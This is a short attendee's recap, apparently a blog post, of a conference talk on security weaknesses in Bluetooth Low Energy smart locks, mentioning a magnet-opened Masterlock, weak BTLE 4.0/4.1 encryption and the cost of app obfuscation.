“Lockpicking in the IoT, …or why adding BTLE to a device sometimes isn’t smart at all” by Ray was one of my favourite talks, as it beautifully showed many different attack vectors as well as giving a nice guide for getting started in this area.
It impressed me how carefree vendors and startups handled hardware and software security in “smart” devices as it seems that their devices were more or less easy to own. In his talk Ray pointed out physical AND implementational weaknesses that remained even after he reported them to the vendors.
The most prominent sample he gave was when he opened a “Masterlock” by spinning a magnet on the lock itself to open it.
Most interesting for beginners like me was the Software part where he showed which tools are great to start and how to use them against your BTLE Gadgets. I found it very important that he also pointed out that BTLE 4.0/4.1 doesn’t use, or at least uses very weak, security against sniffing/decrypting
and it’s better to wait for BTLE 4.2 as it implements better security measures.
Another good point was the reminder to vendors that obfuscating their apps to protect against reverse engineering isn’t a good Idea either, because severe bugs will be never or at least a lot later found.
So all in all it was a very interesting talk that combined hardware hacking, research and reverse engineering pretty good and is a good first impression for beginners.
Thank you for reading and see you at TROOPERS17!